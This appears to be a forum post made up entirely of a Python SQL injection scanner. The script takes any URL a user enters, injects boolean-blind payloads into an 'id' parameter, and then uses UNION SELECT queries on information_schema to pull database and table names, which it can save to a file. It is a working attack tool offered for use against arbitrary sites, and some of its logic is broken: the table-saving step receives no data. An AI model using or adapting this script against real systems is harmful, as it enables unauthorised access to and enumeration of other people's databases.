[Python] 纯文本查看 复制代码 import requests
import os
from urllib.parse import urlparse, urlunparse, parse_qs, urlencode
from datetime import datetime
class MiniSQLiScanner:
def __init__(self, target_url):
self.target_url = self.normalize_url(target_url)
self.vulnerable = False
self.save_path = self.get_save_path()
self.databases = [] # 存储数据库列表
self.selected_db = None # 用户选择的数据库
def normalize_url(self, url):
"""
规范化URL,确保有测试参数
"""
parsed_url = urlparse(url)
if not parsed_url.query: # 如果URL没有参数
# 添加一个测试参数(如?id=1)
new_query = "id=1"
parsed_url = parsed_url._replace(query=new_query)
return urlunparse(parsed_url)
def get_save_path(self):
"""
根据操作系统选择保存路径
"""
if os.name == "posix": # Android(基于Linux)
return "/storage/emulated/0/我的文件/"
elif os.name == "nt": # Windows
return "C:\\Users\\Public\\Documents\\"
else:
return "./" # 其他系统,保存到当前目录
def send_request(self, payload):
"""
发送带有Payload的HTTP请求
"""
try:
# 将Payload添加到URL参数中
parsed_url = urlparse(self.target_url)
query_params = parse_qs(parsed_url.query)
# 假设测试参数是 'id'
if 'id' in query_params:
query_params['id'][0] += payload
else:
query_params['id'] = [payload]
new_query = urlencode(query_params, doseq=True)
target_url_with_payload = urlunparse(parsed_url._replace(query=new_query))
response = requests.get(target_url_with_payload)
return response.text, response.status_code
except requests.exceptions.RequestException as e:
print(f"请求失败: {e}")
return None, None
def detect_vulnerability(self):
"""
检测SQL注入漏洞
"""
# 布尔盲注测试
true_payload = "' AND 1=1 -- "
false_payload = "' AND 1=2 -- "
true_response, _ = self.send_request(true_payload)
false_response, _ = self.send_request(false_payload)
if true_response and false_response and true_response != false_response:
print("[+] 目标可能存在SQL注入漏洞!")
self.vulnerable = True
else:
print("[-] 目标可能不存在SQL注入漏洞。")
def extract_databases(self):
"""
提取所有数据库名称
"""
payload = "' UNION SELECT null, schema_name FROM information_schema.schemata -- "
response, _ = self.send_request(payload)
if response:
self.databases = response.strip().split("\n")
print("[+] 数据库列表:")
for i, db in enumerate(self.databases, start=1):
print(f" {i}. {db}")
def select_database(self):
"""
用户选择数据库
"""
if not self.databases:
print("[-] 未找到数据库。")
return
try:
choice = int(input("请输入要操作的数据库编号:"))
if 1 <= choice <= len(self.databases):
self.selected_db = self.databases[choice - 1]
print(f"[+] 已选择数据库: {self.selected_db}")
else:
print("[-] 输入编号无效。")
except ValueError:
print("[-] 请输入有效的数字。")
def extract_tables(self):
"""
提取当前数据库的表名
"""
if not self.selected_db:
print("[-] 请先选择数据库。")
return
payload = f"' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema = '{self.selected_db}' -- "
response, _ = self.send_request(payload)
if response:
tables = response.strip().split("\n")
print(f"[+] 数据库 '{self.selected_db}' 的表名列表:")
for i, table in enumerate(tables, start=1):
print(f" {i}. {table}")
def save_to_file(self, content, filename):
"""
将内容保存到文件
"""
if not os.path.exists(self.save_path):
os.makedirs(self.save_path)
file_path = os.path.join(self.save_path, filename)
with open(file_path, "w", encoding="utf-8") as file:
file.write(content)
print(f"[+] 文件已保存到: {file_path}")
def run(self):
"""
运行扫描器
"""
print(f"[*] 开始扫描目标: {self.target_url}")
self.detect_vulnerability()
if self.vulnerable:
print("\n[*] 尝试提取数据库信息...")
self.extract_databases()
self.select_database()
if self.selected_db:
self.extract_tables()
# 保存数据库信息
save_choice = input("\n是否保存数据库信息?(y/n): ").lower()
if save_choice == "y":
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"{self.selected_db}_info_{timestamp}.txt"
content = f"数据库名称: {self.selected_db}\n\n表名列表:\n"
tables = self.extract_tables()
if tables:
content += "\n".join(tables)
self.save_to_file(content, filename)
if __name__ == "__main__":
# 用户只需输入普通网址
base_url = input("请输入目标URL(例如:[url]http://example.com[/url]):")
scanner = MiniSQLiScanner(base_url)
scanner.run() |